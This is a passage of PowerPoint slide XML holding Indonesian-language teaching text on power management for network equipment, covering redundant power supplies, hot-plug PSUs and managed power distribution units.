              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kehilangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peristiwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tegangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rendah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rusak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kejadian-kejadian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipulihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Catu Daya Ganda</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> enterprise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enklosur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> unit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>catu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (PSU) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>redundansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. PSU hot plug </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diganti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mematikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Unit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Distribusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Daya </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Terkelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> (PDU)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sirkuit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memasok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lemari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cukup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditambah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertumbuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sirkuit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sirkuit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rumah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kantor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (30 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 60 ampere </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibandingkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 13 ampere, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sirkuit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dijalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> unit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>distribusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (PDU). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilengkapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sirkuit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membersihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sinyal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lonjakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lonjakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peristiwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bawah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tegangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>; dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terintegrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>catu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
